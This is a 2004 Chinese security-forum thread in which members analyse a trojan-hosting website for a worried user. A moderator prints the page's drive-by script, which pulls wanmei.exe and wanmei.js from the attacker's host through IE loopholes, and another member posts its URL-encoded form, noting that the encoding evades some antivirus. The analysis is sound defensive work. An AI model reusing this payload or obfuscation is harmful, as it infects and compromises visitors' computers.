论坛: 病毒专区 标题: 关于网页木马~~!! 复制本贴地址    
作者: kenny [kenny99]    论坛用户   登录
[URL=http://wo595123.nease.net/
谁帮我看一下这个网站,带木马,我搞不清楚,有许多网站都是和他相连的比如:867.126.com
和9493.126.com
请将源代码发到我邮箱里,非常感谢,啊Q帮我啊,我没办法了,我试过很多方法,就是弄不请是怎么回事,也可以加我QQ:64336113讨论以下啊,谢谢]http://wo595123.nease.net/谁帮我看一下这个网站,带木马,我搞不清楚,有许多网站都是和他相连的比如:867.126.com和9493.126.com请将源代码发到我邮箱里,非常感谢,啊Q帮我啊,我没办法了,我试过很多方法,就是弄不请是怎么回事,也可以加我QQ:64336113讨论以下啊,谢谢[/URL]


[此贴被 kenny(kenny99) 在 10月05日22时52分 编辑过]

地主 发表时间: 04-10-05 20:03

回复: kailangq [kailangq]   版主   登录
每次都以身试毒,晕死


--------------------------------------------------------------------------------
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="<HTML><HEAD><META http-equiv=Content-Type content="text/html; charset=gb2312"><TITLE>2004最新版大话西游2烧法外挂!自动捕捉修罗!点击对话框~  </TITLE></HEAD><BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0"><SCRIPT LANGUAGE="EARTHSIMULATOR" src="http://wo595123.nease.net/wanmei.exe"></SCRIPT><SCRIPT LANGUAGE="javascript">jsurl="http://wo595123.nease.net/wanmei.js".replace(/\//g,'//');WIE=navigator.appVersion;if(WIE.indexOf("MSIE 5.0")>-1){document.write("<iframe style='display:none;' name='EARTHSIMULATOR' src='newtimes://'></iframe>");setTimeout("muma0()",1000);}else {window.open("newtimes://","_search");setTimeout("muma1()",1000);}function muma0(){window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","EARTHSIMULATOR");}function muma1(){window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","_search");}</SCRIPT></BODY></HTML>
"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
--------------------------------------------------------------------------------

请注意红色部分,用脚本种入wanmei.exe以及wanmei.js木马


B1层 发表时间: 04-10-06 00:52

回复: kenny [kenny99]   论坛用户   登录
谢谢你的回复,明白了

B2层 发表时间: 04-10-07 00:52

回复: darken [darken]   论坛用户   登录
为什么我看到的代码和你不一样,我看到的是:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3CHTML%3E%3CHEAD%3E%3CMETA%20http%2Dequiv%3DContent%2DType%20content%3D%22text%2Fhtml%3B%20charset%3Dgb2312%22%3E%3CTITLE%3E2004%u6700%u65B0%u7248%u5927%u8BDD%u897F%u6E382%u70E7%u6CD5%u5916%u6302%uFF01%u81EA%u52A8%u6355%u6349%u4FEE%u7F57%uFF01%u70B9%u51FB%u5BF9%u8BDD%u6846%7E%20%20%3C%2FTITLE%3E%3C%2FHEAD%3E%3CBODY%20oncontextmenu%3D%22return%20false%22%20onselectstart%3D%22return%20false%22%20scroll%3D%22no%22%20topmargin%3D%220%22%20leftmargin%3D%220%22%3E%3CSCRIPT%20LANGUAGE%3D%22EARTHSIMULATOR%22%20src%3D%22http%3A%2F%2Fwo595123%2Enease%2Enet%2Fwanmei%2Eexe%22%3E%3C%2FSCRIPT%3E%3CSCRIPT%20LANGUAGE%3D%22javascript%22%3Ejsurl%3D%22http%3A%2F%2Fwo595123%2Enease%2Enet%2Fwanmei%2Ejs%22%2Ereplace%28%2F%5C%2F%2Fg%2C%27%2F%2F%27%29%3BWIE%3Dnavigator%2EappVersion%3Bif%28WIE%2EindexOf%28%22MSIE%205%2E0%22%29%3E%2D1%29%7Bdocument%2Ewrite%28%22%3Ciframe%20style%3D%27display%3Anone%3B%27%20name%3D%27EARTHSIMULATOR%27%20src%3D%27newtimes%3A%2F%2F%27%3E%3C%2Fiframe%3E%22%29%3BsetTimeout%28%22muma0%28%29%22%2C1000%29%3B%7Delse%20%7Bwindow%2Eopen%28%22newtimes%3A%2F%2F%22%2C%22%5Fsearch%22%29%3BsetTimeout%28%22muma1%28%29%22%2C1000%29%3B%7Dfunction%20muma0%28%29%7Bwindow%2Eopen%28%22file%3Ajavascript%3Adocument%2Eall%2Etags%28%27SCRIPT%27%29%5B0%5D%2Esrc%3D%27%22%2Bjsurl%2B%22%27%3Beval%28%29%3B%22%2C%22EARTHSIMULATOR%22%29%3B%7Dfunction%20muma1%28%29%7Bwindow%2Eopen%28%22file%3Ajavascript%3Adocument%2Eall%2Etags%28%27SCRIPT%27%29%5B0%5D%2Esrc%3D%27%22%2Bjsurl%2B%22%27%3Beval%28%29%3B%22%2C%22%5Fsearch%22%29%3B%7D%3C%2FSCRIPT%3E%3C%2FBODY%3E%3C%2FHTML%3E%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>


B3层 发表时间: 04-10-07 12:26

回复: wincss [wincss]   论坛用户   登录
你看到的是加密后的代码,他的代码是解密之后的

B4层 发表时间: 04-10-07 15:57

回复: lijingxi [lijingxi]   见习版主   登录
楼上说的对! 网站代码加密了!
用这样的方法也可以逃个一部分杀毒软件!

B5层 发表时间: 04-10-12 08:29

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号